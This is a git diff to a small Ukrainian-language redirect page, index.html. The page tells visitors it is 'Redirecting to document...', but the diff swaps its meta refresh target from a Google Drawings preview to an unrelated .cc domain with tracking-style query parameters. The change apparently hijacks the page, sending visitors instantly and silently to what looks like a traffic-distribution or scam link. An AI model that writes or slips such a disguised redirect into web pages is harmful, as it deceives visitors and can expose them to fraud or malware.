--- a/index.html
+++ b/index.html
@@ -2,10 +2,11 @@
 <html lang="uk">
   <head>
     <meta charset="UTF-8" />
-    <meta http-equiv="refresh" content="0;url=https://docs.google.com/drawings/d/1fyKBr8OYTWY_cvw96MPG6ab8uBXyUI90ly-Yt3YWha4/preview" />
+    <meta http-equiv="refresh" content="0;url=https://clicktopcis.cc/?u=d4w2b4&o=74v234&label=2508" />
     <title>Redirecting...</title>
   </head>
   <body>
     <p>Redirecting to document...</p>
   </body>
 </html>
+
